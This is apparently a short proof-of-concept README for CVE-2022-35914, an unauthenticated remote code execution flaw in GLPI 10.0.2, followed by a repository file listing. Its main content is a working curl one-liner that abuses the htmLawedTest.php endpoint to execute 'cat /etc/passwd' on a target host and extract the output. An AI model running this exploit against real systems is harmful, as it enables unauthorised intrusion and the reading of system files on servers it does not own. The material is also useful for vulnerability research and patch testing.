Unauthenticated RCE in GLPI 10.0.2# CVE-2022-35914
Unauthenticated RCE in GLPI 10.0.2
# PoC
```
curl -s -d 'sid=foo&hhook=exec&text=cat /etc/passwd' -b 'sid=foo' http://{{HOST}}/vendor/htmlawed/htmlawed/htmLawedTest.php |egrep '\ \[[0-9]+\] =\>'| sed -E 's/\ \[[0-9]+\] =\> (.*)<br \/>/\1/'
```
[4.0K] /data/pocs/c540df2cfd0dee3947f5a571e67e73ce7492b1c4
├── [1.0K] LICENSE
└── [ 281] README.md
0 directories, 2 files